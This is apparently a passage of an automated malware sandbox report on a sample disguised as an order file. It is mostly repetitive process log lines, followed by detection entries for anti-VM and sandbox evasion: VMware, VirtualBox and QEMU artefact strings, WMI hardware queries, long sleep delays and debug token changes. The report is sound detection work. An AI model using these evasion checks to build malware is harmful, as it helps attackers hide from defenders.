                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 32.2.svchost.exe.5f89510.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5a90000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5a90000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.svchost.exe.6330000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.svchost.exe.5f70000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.svchost.exe.5f70000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.svchost.exe.6349510.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5aa9510.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.svchost.exe.6330000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000030.00000002.929093994.0000000006280000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.737999019.0000000005A90000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.850912152.0000000006330000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.786901859.0000000005F70000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000002.920418875.0000000005C10000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.895927015.0000000005330000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.723973005.0000000003251000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL?
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp, svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.804585113.00000000037A1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: svchost.exe, 00000020.00000002.759358172.00000000033E1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLLEV
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\net1.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\net1.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe TID: 900 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5752 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1844 | Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5644 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904 | Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3116 | Thread sleep count: 2874 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6968 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5384 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 4940 | Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5072 | Thread sleep count: 2586 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5072 | Thread sleep count: 2870 > 30
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe TID: 7148 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe TID: 5584 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5052 | Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5852 | Thread sleep count: 3974 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5852 | Thread sleep count: 5817 > 30
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6625
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1957
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3482
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3603
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Window / User API: threadDelayed 2586
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Window / User API: threadDelayed 2870
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6077
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2613
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Window / User API: threadDelayed 3974
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Window / User API: threadDelayed 5817
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Windows\SysWOW64\net1.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VMwareVBoxARun using valid operating systemUSER
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VMware
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: VIRTUALBOXUSOFTWARE\Oracle\VirtualBox Guest Additions!noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpBinary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
